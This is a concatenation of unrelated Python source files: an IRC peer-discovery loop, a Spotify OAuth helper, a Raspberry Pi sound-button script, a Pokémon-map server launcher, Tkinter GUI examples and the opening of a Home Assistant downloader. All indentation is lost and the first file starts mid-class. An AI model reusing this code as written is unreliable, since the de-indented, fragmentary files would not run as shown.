def on_name(self, connection, event):
for s in event.arguments[2].split():
if s.startswith("ELEC_"):
self.who_queue.put((connection, s))
def who_thread(self):
while not self.processor.shared.stopped():
try:
connection, s = self.who_queue.get(timeout=1)
except Queue.Empty:
continue
#logger.info("who: "+ s)
connection.who(s)
time.sleep(1)
def run(self):
while self.processor.shared.paused():
time.sleep(1)
self.ircname = self.host + ' ' + self.getname()
# avoid UnicodeDecodeError using LenientDecodingLineBuffer
irc.client.ServerConnection.buffer_class = irc.buffer.LenientDecodingLineBuffer
logger.info("joining IRC")
t = threading.Thread(target=self.who_thread)
t.start()
while not self.processor.shared.stopped():
client = irc.client.Reactor()
try:
#bind_address = (self.irc_bind_ip, 0) if self.irc_bind_ip else None
#ssl_factory = irc.connection.Factory(wrapper=ssl.wrap_socket, bind_address=bind_address)
#c = client.server().connect('irc.freenode.net', 6697, self.nick, self.password, ircname=self.ircname, connect_factory=ssl_factory)
c = client.server().connect('irc.freenode.net', 6667, self.nick, self.password, ircname=self.ircname)
except irc.client.ServerConnectionError:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
c.add_global_handler("welcome", self.on_connect)
c.add_global_handler("join", self.on_join)
c.add_global_handler("quit", self.on_quit)
c.add_global_handler("kick", self.on_kick)
c.add_global_handler("whoreply", self.on_who)
c.add_global_handler("namreply", self.on_name)
c.add_global_handler("disconnect", self.on_disconnect)
c.set_keepalive(60)
self.connection = c
try:
client.process_forever()
except BaseException as e:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
logger.info("quitting IRC")
|
authenticate.py
|
# shows a user's playlists (need to be authenticated via oauth)
import threading
import spotipy.oauth2 as oauth2
import spotipy
import queue
import os
from os.path import isdir, expanduser
from urllib.parse import urlparse
from bottle import route, run, response, request
auth_token_queue = queue.Queue()
event_queue = queue.Queue()
@route('/')
def index():
auth_code = request.query.code
if auth_code:
auth_token_queue.put(auth_code)
return "It worked! You may close this tab now"
return "Oops! Something went wrong. Please file a bug report"
def wait_for_done(task):
server = threading.Thread(target=task)
server.daemon = True
server.start()
while True:
event = event_queue.get()
if event == "done":
break
def run_server(host, port):
threading.Thread(target= lambda: wait_for_done(lambda: run(quiet=True,
host=host,
port=port))).start()
def get_cache_path(username):
cache_directory = expanduser("~/.cache")
if isdir(cache_directory):
return expanduser("~/.cache/.spotipy_credentials_cache-%s" % username)
return ".spotipy_credentials_cache-%s" % username
def prompt_for_user_token(username,
scope=None,
client_id = None,
client_secret = None,
redirect_uri = None):
"""
prompts the user to login if necessary and returns
the user token suitable for use with the spotipy.Spotify
constructor
Parameters:
- username - the Spotify username
- scope - the desired scope of the request
- client_id - the client id of your app
- client_secret - the client secret of your app
- redirect_uri - the redirect URI of your app
"""
if not client_id:
client_id = os.getenv("SPOTIPY_CLIENT_ID")
if not client_secret:
client_secret = os.getenv("SPOTIPY_CLIENT_SECRET")
if not redirect_uri:
redirect_uri = os.getenv("SPOTIPY_REDIRECT_URI", "http://localhost:8080")
if not client_id:
print('''
You need to set your Spotify API credentials. You can do this by
setting environment variables like so:
export SPOTIPY_CLIENT_ID='your-spotify-client-id'
export SPOTIPY_CLIENT_SECRET='your-spotify-client-secret'
export SPOTIPY_REDIRECT_URI='your-app-redirect-url'
Get your credentials at
https://developer.spotify.com/my-applications
''')
raise spotipy.SpotifyException(550, -1, 'no credentials set')
sp_oauth = oauth2.SpotifyOAuth(client_id, client_secret, redirect_uri,
scope=scope, cache_path=get_cache_path(username))
# try to get a valid token for this user, from the cache,
# if not in the cache, the create a new (this will send
# the user to a web page where they can authorize this app)
token_info = sp_oauth.get_cached_token()
if not token_info:
redirect_uri_parsed = urlparse(redirect_uri)
run_server(redirect_uri_parsed.hostname,
redirect_uri_parsed.port)
auth_url = sp_oauth.get_authorize_url()
try:
import webbrowser
webbrowser.open(auth_url)
except:
print("Please navigate here: %s" % auth_url)
response = "%s?code=%s" % (redirect_uri, auth_token_queue.get())
event_queue.put("done")
code = sp_oauth.parse_response_code(response)
token_info = sp_oauth.get_access_token(code)
# Auth'ed API request
if token_info:
return token_info['access_token']
else:
return None
|
playback.py
|
import os
import time
import random
import threading
import RPi.GPIO as GPIO
# Define sounds
SOUNDS = {11: {'audio': ['CS_01.wav', 'CS_02.wav', 'CS_06.wav', 'CS_07.wav', 'CS_08.wav', 'CS_09.wav'], 'last_action': 0},
12: {'audio': ['CHM_01.wav', 'CHM_02.wav', 'CHM_03.wav', 'CHM_04.wav', 'CHM_05.wav'], 'last_action': 0},
13: {'audio': ['CL_01.wav', 'CL_02.wav', 'CL_03.wav', 'CL_05.wav', 'CL_06.wav'], 'last_action': 0},
15: {'audio': ['EPF_01.wav', 'EPF_02.wav', 'EPF_03.wav', 'EPF_04.wav', 'EPF_05.wav'], 'last_action': 0},
16: {'audio': ['CCC_01.wav', 'EBT_01.wav', 'EGF_01.wav', 'GC_01.wav', 'YH_01.wav'], 'last_action': 0},
18: {'audio': [], 'last_action': 0},
22: {'audio': [], 'last_action': 0}
}
# Define random playback interval
LAST_RANDOM_PLAYBACK = time.time()
# Ignore warning for now
GPIO.setwarnings(False)
# Use physical pin numbering
GPIO.setmode(GPIO.BOARD)
# Pin Setup
GPIO.setup(11, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(12, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(13, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(15, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(16, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(18, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(22, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
# Play sound using simple aplay command
def playSound(path):
print('PLAYING:', path)
os.system('aplay ' + path)
# Choose random sound to play
def playRandomSound():
global LAST_RANDOM_PLAYBACK
# Time
now = time.time()
# Check if recent button action
for c in SOUNDS:
if now - SOUNDS[c]['last_action'] < 20:
return None
# Check for last random playback
if not now - LAST_RANDOM_PLAYBACK < random.randint(10, 30):
LAST_RANDOM_PLAYBACK = now
button_callback(random.choice([11, 12, 13, 15, 16]), True)
# Button callback
def button_callback(channel, isRandom=False):
global SOUNDS
# Time
now = time.time()
# Wait for timeout
if now - SOUNDS[channel]['last_action'] > 1.5:
# Save time of last button press
if not isRandom:
SOUNDS[channel]['last_action'] = now
# Randomly select a file to play
afile = random.choice(SOUNDS[channel]['audio'])
# Execute button actions
t = threading.Thread(target=playSound, args=('sounds/' + afile,))
t.start()
# Register button events
GPIO.add_event_detect(11, GPIO.FALLING, callback=button_callback)
GPIO.add_event_detect(12, GPIO.FALLING, callback=button_callback)
GPIO.add_event_detect(13, GPIO.FALLING, callback=button_callback)
GPIO.add_event_detect(15, GPIO.FALLING, callback=button_callback)
GPIO.add_event_detect(16, GPIO.FALLING, callback=button_callback)
GPIO.add_event_detect(18, GPIO.FALLING, callback=button_callback)
GPIO.add_event_detect(22, GPIO.FALLING, callback=button_callback)
# Run until someone presses ctrl+c
while True:
try:
time.sleep(0.1)
playRandomSound()
except KeyboardInterrupt:
print('TERMINATED')
break
except:
continue
# Clean up
print('CLEANING UP')
GPIO.cleanup()
|
runserver.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import logging
import sys
from threading import Thread
from pogom import config
from pogom.app import Pogom
from pogom.models import create_tables
from pogom.search import search_loop, set_cover, set_location, search_loop_async
from pogom.utils import get_args
log = logging.getLogger(__name__)
def start_locator_thread(args):
if args.pycurl:
search_thread = Thread(target=search_loop_async, args=(args,))
else:
search_thread = Thread(target=search_loop, args=(args,))
search_thread.daemon = True
search_thread.name = 'search_thread'
search_thread.start()
if __name__ == '__main__':
args = get_args()
logging.basicConfig(stream=sys.stdout, level=logging.INFO,
format='%(asctime)s [%(module)11s] [%(levelname)7s] %(message)s')
if not args.debug:
logging.getLogger("peewee").setLevel(logging.INFO)
logging.getLogger("requests").setLevel(logging.WARNING)
logging.getLogger("pogom.pgoapi.pgoapi").setLevel(logging.WARNING)
logging.getLogger("pogom.pgoapi.rpc_api").setLevel(logging.WARNING)
logging.getLogger("pogom.models").setLevel(logging.WARNING)
logging.getLogger("werkzeug").setLevel(logging.WARNING)
elif args.debug == "info":
logging.getLogger("pogom.pgoapi.pgoapi").setLevel(logging.INFO)
logging.getLogger("pogom.models").setLevel(logging.INFO)
logging.getLogger("werkzeug").setLevel(logging.INFO)
elif args.debug == "debug":
logging.getLogger("pogom.pgoapi.pgoapi").setLevel(logging.DEBUG)
logging.getLogger("pogom.pgoapi.pgoapi").setLevel(logging.DEBUG)
logging.getLogger("pogom.models").setLevel(logging.DEBUG)
logging.getLogger("werkzeug").setLevel(logging.INFO)
create_tables()
set_location(args.location, args.radius)
set_cover()
start_locator_thread(args)
app = Pogom(__name__)
config['ROOT_PATH'] = app.root_path
app.run(threaded=True, debug=args.debug, host=args.host, port=args.port)
|
examples.py
|
# ------------------------------------------------------------------------------
# Created by Tyler Stegmaier.
# Property of TrueLogic Company.
# Copyright (c) 2020.
# ------------------------------------------------------------------------------
#
# ------------------------------------------------------------------------------
import queue
import random
from time import sleep
from typing import List, Union
from TkinterExtensions import *
print('TkinterExtensions.version', version)
class MainMenu_Colors: NumPadEntry = None
def _GetPhotoByteData() -> dict:
"""
PhotoData.keys:
exit
:return:
:rtype: dict
"""
items = {
'exit': b'iVBORw0KGgoAAAANSUhEUgAAAEYAAABGCAYAAABxLuKEAAAAAXNSR0IArs4c6QAAAARnQU1BAACx\njwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAYdEVYdFNvZnR3YXJlAHBhaW50Lm5ldCA0LjEu'
b'\nMWMqnEsAABMVSURBVHhe3ZwLcJXVtcdDEPGJSFugtKKRSu0ISHm0wlTBGae2MzIjoLYzOFKnrZ22\nQ5VO25kOiBBAW0dQMYKKXuB6wdw0PupVbgVFKM/wkhQC8kog5EGekJNzTp4nu//f7v7S5JzvJDl5\ngHTN/OV4vr3XXv/17b3X2o+TpAssvRyShcuEPsLlQl/hCgc+8x3PKENZr95/lEAIghC+RhggfFW4\nSfimMEIYLYxx4DPf8YwylKUOddGBrkvWSZ4zrhQgNVQYKdwlPDp06NBnpk6dunb27NkfL168eO+y\nZctyli9ffhzwme94RhnKUsfVRQe6rhfQfck4CSMZAv2ErwvfFh4aP378y/Pnz8/KzMwM5uXlmUgk\nYjoiTU1Ntix13n777Wp0jB079mXpfNDppg3aos0vpIM8h/QXbhYmDxs27E9PP/109p49e8QtYkla\n6HOooMCc/eQTc/L1103OwoXmwO9+Z/b96lcWfOY7nlEmVFho63j10bV79+4IummDtlybtP2FcRBG\n0J2vFVKEeyZOnPj62rVry8PhcDMZHHHy1VfNjgcfNO8PHmwyevUyGUlJFv8bB95zylKHuuhAl6eX\nNmiLNmnb2YAtF3WIES2IIoOFO0aMGLF03bp15Q0NDdboBhl9as0as3nyZJMpcn9xRNOFdcL/CGuE\n1cJ/RYHveEYZylKHuujITE62OtHd6JxfX19vaPu2225bIlu+62zCNmy8oNJb4M0M79u376Opqak5\n58+f/5eRgYD5/JlnzAeDBpm3HRmIvSlA+lXhJUEMjMaBWSykCvMd+Mx3fxYoQ1nqUBcd6EInummD\ntmiTtrFhwYIFh/r06fMTbHM2YmuPizd0iDSaB8em7dixoxajIuopuerqHw4caN5xxvO2VwkrBEhC\n+kkBsvSATcI+4Yhw0oHPfMczylB2rkBddKALneimDdqizdzXXjORxkbrINlUM27cOFVNGuts7dGh\nhWImt0HC3TNnztxUVlZmJ8OqnByzZcIE856M5E2+JfCGlwmLHPge0o2CSRDUoS46PH3opg3a4nva\nxoaqw4etTdgmGz/BVmdzj0zMKCQbHSJMeeqppw4zrjEgT2/qgyuvNO/KMN4wcwNvmTesuGoOCBHB\nj3BngC50ops2aIs2aRsbPrjqKpO3cqW1DRvnzZt3GJsFEkU4dJtzvJ6CU6a9+OKLp2i0sbbWHPj5\nz837ziDe3GuCsjHzgnBUaOph0AZt0SZtYwO2YNOBxx6zNmKrbM6T7VMFnNNtPYfxSVec4jmlvrra\n7PrBD8z/yQDGONGDN7dQ2CLQ9S8kaJO2sQFbcA62YSO2tnAOPQcucOqSMKMzed3N8PGcsnPSJPOB\nM+C/BSbFF4VioeECoT4KtI0NSwVsssNKwFbPORpWOXBxnDodrcgBCHdjmWgZrw3qmnvuvdesdw1j\nwLMCbykk1F1kYAMhHZs852DrHvUcbK8VHnnkESZkohXcEs5zGIMkSMMJyaWlpaZRofCg5pS/qaG/\nChhArkHjNV8wMLyxDRuxFZsPMueIQ0lJiRkzZgyhnDwHjgnNN4zBwSRv27Ztq0VhvqLPR2qA7kkO\n8ZyAU8Ierr7a1Nx8sy/CSumbyyUIekFLhC+/3LcNEL7hhuZy2IaN2IrN2A4HuGzfvr1GSSArdjLk\nDs83eJBudgcZLYoChw6ZTxSS/1/KSarIIRg+wRYI9etnIseOsSSOQZPGePjWW1uV7yzqX3nFtw1Q\nO2tWc7lqARuxFZuxfZNeXkA5F5zgBkfHtUO9hnCWonXH0nPnzpmGujqzR4nTBikmiSIspgnnhEAU\nQmPGGA1kt2nQWiLZ2aZazo2ukwjCP/qR0xYrDe+8YwJak7UsXylgKzZjOxz2TJxoGjVfwg2OcHWc\n2xQmI5bv97BqxbNnlOZrtrKTGG+AsXtKqIqD8K9/7UyNlTp15fMq0xkEvvEN01RV5TS1lkhenqm6\n/nrfeorR1mZshwNczqjXsdiFI1wd5zZ7DZ67mWU8M3itvLpN65CNUsaERjKFYnpLW6jLzHQmx0rw\nxz/2rdMm+vY1jXv3Og1RorcfUI+md8QDNhPK4QCX7Vp81mnBWVNTYyZMmMCWBfs5cXsNHmM37O43\n33zTbh+cWrzYbJYixidbAaThFR1AZf/+JpKb6yxvLbz1c3r7fvXioWbZMlc7VkK//71vnZZQt7C2\nwwEucIIbHMW1TJzZ7IK7b69hdv76sGHD/lytybIuGDQ71VtY5eJpEqfPBBrxII1xce4739HYqXPm\nt5aGfftMuXqBX71oVE2b5mrFSt2HH5oyzSt+9aKxX4AD0QpOcINjIBAwKSkp7ASyTeobodhc/vai\nRYuy8WTxqlVmqxQwYZEPMIGVJojqJ55wFGIlnJbmW6clylNSTJOGs59EzpwxZV/+silRuY6CfR24\nwAlucIQrnOHufNBK6EKkyQ9lZWVFKHxQqfTfVZkcgJl9u3A2Ueht1r73nqMSJQqv56ZP968HlK/U\n79rlCkeJ7Ku4807/em0ADnCBE9zgCNddu3ZpyZX0gMDpQ6vhRBcayg48qX/o9GmzQ6QYi+QATLpF\nncTZAQNM46lTjlFriag3lKhX+NULLlniSsVKYO5c3zrtoUB4XoAT3HYmJ5tQfr5dKtx+++2cPtwg\ntFpDcZA1UousLBxTtGKF2amKHwvsdaCosIOg8WiUKmoQPfykLivLFKp3tCxfft99/0rafKR240ZT\nIEItyycCuMAJbnCEq9u3ycIHzhdW6Dqc8t2VkZERpNCxBx4wO1SJNcZyYZdwpos4p+gRTwJLlzaX\nK1JaHykvd09aS2NxsSlUqG2p10N+B4Ez4AQ3OMIVzpmZmUrDku50vrDDyZtfHj1x4oQt9BnHFarE\nhg8zOQnd6a5CbzmsKOIr6h2lU6aY05ddZmq3bnVfRomSzbP33OOvOwHkCmyTwA2OB4YMsZyPHj1q\n5IOZzhfWMWS7X+UotE7hNaz5Za/ml22qxF6qsh/rmERAtumHfEWRBkUTP4lUVJjAypXu/2Ll3MKF\nvjo7AzjBDY5wDRcU2Hlm4MCBHAezy2e3I5h4b7r//vvX4rnKDRvsLj3hjK1CDr/wcnehUNGkSZEg\nEQlv2WJye/du1uGdKHQWcIIbHOFa+dFHSrnqDD7AF84nNhX+5uOPP/4xD0u0NqIw4YyYT2g70c0o\n/+MfHeX2pbG01OR97Wu+ejoLOMENjnCFM9zxAb5wPrE75yMWLly4l4dFCxbYLJF9VM5vmL2PdTc0\n3wT1ltqVSMQU/PCH/jq6ADjBDY5whTPc8QG+cD6x4Wn0888/n8PDgt/+1qb+VHrD/ctufFfxeRSO\nKyVvKCpyHvCXimefjanXHWjJDa5whjs+wBfOJ3Z7b8xLL7103Drml7+05zZUYpJiHHLY1e3QnBHS\n3BFPGpX8HbniCv+6PjicAOAENzjCFc5wxwf4wvkk1jH/UGHGH17lX7mx21Eyb55zQXwpXbTIt25X\nASdOMXEQXOFMVFq2bFkrxzQPJR4WqVsdVGHWFSzTWYkeSgDUbQ+5kyebJuUl7YrmmFzlLn46ugI4\nwQ2O/D+c4R49lOzkm5qaupeHJfPnW6+S7Sp22QwRr3YXcr7yFVNfWOiYty8NynZzlHB69bUM7jLg\nBDc4whXOcMcH+ML55N/hmoflCl2M2T0C58HslTIOuwWKRlXr1zvKUaLeYeEjAa2PqOursxOAE2sm\nOMIVznCPDtfNCR4PqxRGiSLM1qTNJEKEtO5AwR/+4KjGyllFIBBPCufM8dXZGcAJbnCEK5zhHp3g\nNS8J2AMNnTpljitNZuyxoUO8JwnqCtQ/zRGtsONlvNU7d5p9ffpYBOPswVD38+99z+rqKuAENzjC\nNaxlSigUilkSNC8ijx07ZjeI8zSm6WLM3uzc7Rbodp3F/gEDTF2cPZmGykqTfdNNzWWzU1JsqPaT\nuvx8s/9LX2qlG2BfR5ElsJPnpSGntIiE85EjR2IWkfzHbjukp6dXU6hYS3HFLduoNwGjsFPQG6l8\n911HLUq0qj42bVpMnWPTp8fdj6l8/32rM7pOR8FmOKeTcIMjXOGckZERs+2AEJ5GPvnkk1kUqly+\n3C7W6GqsKxiTzODtgb2OaOT95jeOUqwUp6X51gE8iyd5s2f71ukI4AInuMERrnCGOz5wvmiW5q1N\nroiGcnPt/gkTk5foEfPZv0gE2ePGmSYljX5SvX+/2dm3r289sFNZb/Czz1zp1oLO7PHjW5XHvvbA\nNgMZL5zgdprsW0Oc+WXUqFFp8kHM1iZdh43gh3bs2BHBg2cnTbIeZRYnbDOLo7ij2HnddabmxAlH\npbU0BgJm7y23+NZrib3Dh9uyflJz8qRtw69ePMABLkQjuMERrtu3b4+7GY7Y4xMlOdkUPv/GG3Yr\nkEUXJ3lkikxYeLsjKE1PdxRi5ciMGb51/EDZeFKakeFbJx7gABc4wQ2OjBCtqpXe+B+fIAwnDtz+\nVKlIEVZkKNYKmB05L/ZzfYuFV3s4+thjzvRYKZIx7NAnAurEk6Na5/jViQa2c0cYLnCCGxwrKirM\njTfe2OaBG12IY8rJq1evtlfe2U5k5589jE8F4j//toXdI0eaiOr6STAnx2y5+mrfem1hy1VX2bp+\nonFvdo8a5VuPNZEHz3a4wAlucFyzZk2ZOE9y3GOGkSekwvZQn2PaUFmZKZFn2YVnncLxJmOU7uiH\nzddcY4KHDzuTW0ujJrhdI0b41usIqIsOPwkqB/lUbfvVA9iM7XCAS8mgQZYbx7MTJkxYCWfHPa7g\nMXsNxOs1VQpnnOKxiUwewJbghwK7YC3BLYLC1audqbGS87Of2TJdATriSeGaNb51sBWbsR0OcIET\n3OAIV+E6x71NwXNcHFrCfbVwMGgq7rjD3ookIaI7cmDF1S3Sag8HZ850JsZK0bp1rcp2FrRZ9NZb\nTmus/EM2UMYDiSkTLnOMTeaECi1NQuJ09uxZLg4tgavj3K7gOa5ffVdJTw4xnnyiXOOcY07SaBrk\nLfAv2Pqtb5lGNeYnQS0zNl57bXPZrmJjv34mePy4095aGjT8/37rrc1lubnJv9iM7eWa34IHDti8\nBW5wdFzb7S2eMDsP5lccmzdvrkFRYMUKe/WDBtiQYpbnlhIp9kathT7VGscPG/r3tzeZuhPo3CTd\nftggWyiDbdiIrdYpQuCVV6xT4JScnMwvVBK6nIjgQbb3hnP1s6CgwCqs+ulP7UUcZnVSahImDGAc\nJwrS8p4CNmEbNmIrNgc0P8HhjFbSo0eP5jrrLY5jh3uLJyy96WZjH3744U3M4KGqKhP4/vft9S2v\n50CSLoshvKGLCWzAFmzyegq2Bu6914RkPxxmzJihQNX5C9CeNF+ZnzNnzmE8HiovN4G77rJ345jh\nGb9EJQzi2JMLxxcDmQI2YAuZLbZhI7Zic1BzoDgwr3T5yrwnjEH7I4slS5bk0UBQOUC13gK3NLnG\nxbEnCzmOPtmmIGdg+xDwuadBm7SNDdiCTdiGjdiKzc8995yiddJ9jktC80o8YQwSztjZmkoD1jnn\nz5ug5hwuGtNduXtCAkWYJGKxhODuXk+CNmiLNmkbG7AFm4KaU4Ia+i2c0u0/y0FQxM45iqfQJatc\noyElSyGFci4c86ZIotg+9CZB3ibdvLvAJjY6cQht0BZt0jY2hBSSQ4qg2IaNbvjQU7AdDt3mFE+8\nnkNXvJtJjBneOkd5To2SQO7+YxwXC70tCxIz781CiPS8M/CcgS50ops2aIs2abuG5E15Cjbl5+d7\nE22P/vSvpTA+mbzGEsrJCTAkyO8FXn7Z1Godwi9A6M7kDqxNmKDZ4aPL88bZWoQkoFd5PQt4/+89\n934USl3SenShE920QVu0SdvYgC2bNm2qcSG55Y9FL4gwoxPuhpME8gOp4uJiw8IzqGVETWqqqdfi\nk98Q8Sa9SZo5gGsYhFKGALtqLDFY03hpP5/5jmeUoSx1qOtNquhEN23QVrXapG1skC3ez4vJU7Cx\ny9EnUSEHIEGyP0jnBwssyvjxAkZWK0SGV6409QqXDcnJ9ldotQI/mfF+AAFR7t+yhiHnAHzmO57Z\nHESgDnXR0dC7t6mfNMnqrq6osG3Rptouc2ufi/qDdE8Ys3RT3oz9EwbczV+1alUZP++1DqIXnThh\natLSTP306aZxyBAT6dXL/pbR7yd8HnhGGVuWe3Kqiw50eXr5gRltua2DL8yfMGgp3sTM8p29jUns\nirFNunXr1kYyTo+MdVRenr2oWKuIVjdvnql74glT/4tfWPCZ73gWXr/elm1Zl0iDzgULFhxwO29s\nMtEmbff4BNtZ8RzEbpj3Z1Ie4HLx3Llzs9LT06sOHTpkybUk2xYoSx3qosPt5rNxfUn8mZRowUi6\nM5vL7LxzLMGZDQdaMzkK5Zx41qxZH8+fP3+vMuqcF1544TjgM9/xjDLu2JQTQuqiA12X3B/W8RMM\nJzJwkMUpH+GTZKuzf4oJXZesM+IJhADRgrfNECAbhTBRBPCZ73hGGcp69S6QJCX9E1J0RJklhuMb\nAAAAAElFTkSuQmCC\n',
}
return items
PhotoData = _GetPhotoByteData()
q = queue.Queue()
class HTMLViewer(HTMLLabel):
def __init__(self, master, **kwargs):
self.master = master
super().__init__(master=master, **kwargs)
# def HandlePress(self, event: tkEvent): TkinterEvent.Debug(event)
# def HandleRelease(self, event: tkEvent): TkinterEvent.Debug(event)
# def HandleFocusIn(self, event: tkEvent): TkinterEvent.Debug(event)
# def HandleFocusOut(self, event: tkEvent): TkinterEvent.Debug(event)
d = ItemCollection.Parse([
{
"ID": "G1",
"Name": "G Item 1",
"Children": [
{
"ID": "G1.O1",
"Name": "G1.O1 Item 1",
"Children": [
{
"ID": "G1.O1.I1",
"Name": "G1.O1.I1 Item 1",
},
{
"ID": "G1.O1.I2",
"Name": "G1.O1.I2 Item 2",
},
],
},
{
"ID": "G1.O2",
"Name": "G1.O2 Item 2",
"Children": [
{
"ID": "G1.O2.I1",
"Name": "G1.O2.I1 Item 1",
},
{
"ID": "G1.O2.I2",
"Name": "G1.O2.I2 Item 2",
},
],
},
],
},
{
"ID": "G2",
"Name": "G Item 2",
"Children": [
{
"ID": "G2.O1",
"Name": "G2.O1 Item 1",
"Children": [
{
"ID": "G2.O1.I1",
"Name": "G2.O1.I1 Item 1",
},
{
"ID": "G2.O1.I2",
"Name": "G2.O1.I2 Item 2",
},
],
},
{
"ID": "G2.O2",
"Name": "G2.O2 Item 2",
"Children": [
{
"ID": "G2.O2.I1",
"Name": "G2.O2.I1 Item 1",
},
],
},
{
"ID": "G2.O3",
"Name": "G2.O3 Item 3",
},
],
},
])
class Root(tkRoot):
# sets up Tkinter and creates the other windows and places them accordingly.
def __init__(self):
super().__init__(Screen_Width=800, Screen_Height=480, x=200, y=200)
self.w: List[tk.Widget] = []
self.home = HomeWindow(master=self).PlaceFull()
# self.html = HTMLScrolledText(master=self).PlaceFull()
# self.html.txt = 'Test'
# self.html.hide()
#
# self.other = Widgets.Label(master=self, text='PlaceHodler').PlaceRelative(relx=0.5, rely=0, relwidth=.5, relheight=1)
#
# self.t = HTMLViewer(master=self).PlaceRelative(relx=0, rely=0, relwidth=.5, relheight=1)
# self.t.txt = 'events'
# self.Bind(Bindings.Key, self.HandlePress)
# self.Bind(Bindings.ButtonPress, self.HandlePress)
# self.Bind(Bindings.ButtonRelease, self.HandlePress)
self.nb = NotebookThemed(master=self, height=30).PlaceFull()
self.style.configure('Treeview', rowheight=40, font="-family {Segoe UI Black} -size 12 -slant roman -underline 0 -overstrike 0")
self.p2 = TreeViewHolderThemed(master=self.nb, backgroundColor='white').PlaceFull()
self.nb.Add(self.p2, title='page 1')
self.TreeView = self.p2.TreeView
self.TreeView.SetItems(d)
self.TreeView.SetCommand(self.OnClick)
bold_font = "-family {Segoe UI Black} -size 16 -weight bold -slant roman -underline 0 -overstrike 0"
self.TreeView.SetTags(sel=dict(foreground='green', font=bold_font))
self.p1 = Label(master=self.nb, text='page 1').PlaceFull()
self.nb.Add(self.p1, title='page 2')
# AutoStartTargetedThread(target=self.__run__)
# noinspection PyUnusedLocal
def OnClick(self, event: tk.Event = None):
self.TreeView.OnSelectRow(event)
@staticmethod
def HandlePress(event: tkEvent): TkinterEvent.Debug(event)
def Run(self): self.mainloop()
def __run__(self):
while True:
cls = random.choice([Window1, Window2, Window3, LabelWindow])
self.home.Add(cls)
# DebugWidget(self.home, root=self, Message='__run__')
sleep(2)
# self.after(1000, self.__run__)
class HomeWindow(Frame):
def __init__(self, master: Root):
self.root = master
super().__init__(master)
self.w: List[Widgets.Button] = []
def Add(self, cls: Union[Frame, LabelFrame]):
assert (callable(cls))
w = cls(master=self.root).PlaceFull()
b = Widgets.Button(master=self, text=f'{w.__class__.__name__} [ {len(self.root.w)} ]')
b.SetCommand(lambda: self.closeWindow(w))
i = len(self.root.w)
self.Grid_RowConfigure(i, weight=1)
self.Grid_ColumnConfigure(0, weight=1)
b.Grid(column=0, row=i)
w.hide()
self.root.w.append(w)
def closeWindow(self, w: Union[Frame, LabelFrame]):
w.show()
self.root.home.hide()
class BaseWindow(Frame):
button: Widgets.Button
CreateWidgets: callable
def __init__(self, master: Root):
self.master = master
super().__init__(master)
self.CreateWidgets()
def exit(self):
self.hide()
self.master.home.show()
def OnAppearing(self):
self.button.SetPhoto(PhotoData['exit'])
class Window1(BaseWindow):
def CreateWidgets(self):
self.button = Widgets.Button(master=self, text="button 1").SetCommand(self.exit).Place(relx=0.0, rely=0.0, relheight=1.0, relwidth=1.0)
class Window2(BaseWindow):
def CreateWidgets(self):
self.button = Widgets.Button(master=self, text="button 2").SetCommand(self.exit).Place(relx=0.0, rely=0.0, relheight=1.0, relwidth=1.0)
class Window3(BaseWindow):
nested: Window2
def CreateWidgets(self):
self.button = Widgets.Button(master=self, text="button 3").SetCommand(self.exit).Place(relx=0.0, rely=0.0, relheight=1.0, relwidth=0.5)
self.nested = LabelWindow(master=self).Place(relx=0.5, rely=0.0, relheight=1.0, relwidth=0.5)
class LabelWindow(LabelFrame):
button: Widgets.Button
CreateWidgets: callable
def __init__(self, master: Root or BaseWindow):
self.master = master
super().__init__(master, text=str(self.__class__.__name__))
self.button = Widgets.Button(master=self, text="button 4").SetCommand(self.exit).Place(relx=0.0, rely=0.0, relheight=1.0, relwidth=0.5)
def exit(self):
self.hide()
self.master.home.show()
def test():
""" https://stackoverflow.com/questions/7878730/ttk-treeview-alternate-row-colors """
from random import choice
colors = ["red", "green", "black", "blue", "white", "yellow", "orange", "pink", "grey", "purple", "brown"]
def recolor():
for child in tree.TreeView.get_children():
picked = choice(colors)
tree.TreeView.item(child, tags=(picked,), values=(picked,))
for color in colors:
tree.TreeView.tag_configure(color, background=color)
tree.TreeView.tag_configure("red", background="red")
root = tkRoot(800, 480, 200, 200)
print('tkinter.info.patchlevel', root.tk.call('info', 'patchlevel'))
style = Style(root)
style.configure("Treeview", foreground="yellow", background="black", fieldbackground="green")
frame = Frame(root).PlaceFull().SetID(1234)
print(frame.__name__)
print(str(frame))
print(repr(frame))
tree = TreeViewHolderThemed(frame, backgroundColor='white')
tree.TreeView["columns"] = ("one", "two", "three")
tree.TreeView.column("#0", width=100, minwidth=30, stretch=Bools.NO)
tree.TreeView.column("one", width=120, minwidth=30, stretch=Bools.NO)
tree.TreeView.heading("#0", text="0", anchor=AnchorAndSticky.West)
tree.TreeView.heading("one", text="1", anchor=AnchorAndSticky.West)
for i in range(30): tree.TreeView.insert("", i, text=f"Elem {i} ", values="none")
tree.Pack(side=Side.top, fill=Fill.both, expand=True)
Button(frame, text="Change").SetCommand(recolor).Pack(fill=tk.X)
root.mainloop()
def test1():
Root().Run()
def run_all():
# from TkinterExtensions.Widgets.KeyBoard import KeyBaordTestFrame
# KeyBaordTestFrame.test()
# test()
# test1()
pass
if __name__ == '__main__':
run_all()
|
downloader.py
|
"""
Support for functionality to download files.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/downloader/
"""
import logging
import os
import re
import threading
import requests
import voluptuous as vol
from homeassistant.helpers import validate_config
import homeassistant.helpers.config_validation as cv
from homeassistant.util import sanitize_filename
DOMAIN = "downloader"
SERVICE_DOWNLOAD_FILE = "download_file"
ATTR_URL = "url"
ATTR_SUBDIR = "subdir"
SERVICE_DOWNLOAD_FILE_SCHEMA = vol.Schema({
# pylint: disable=no-value-for-parameter
vol.Required(ATTR_URL): vol.Url(),
vol.Optional(ATTR_SUBDIR): cv.string,
})
CONF_DOWNLOAD_DIR = 'download_dir'
# pylint: disable=too-many-branches
def setup(hass, config):
"""Listen for download events to download files."""
logger = logging.getLogger(__name__)
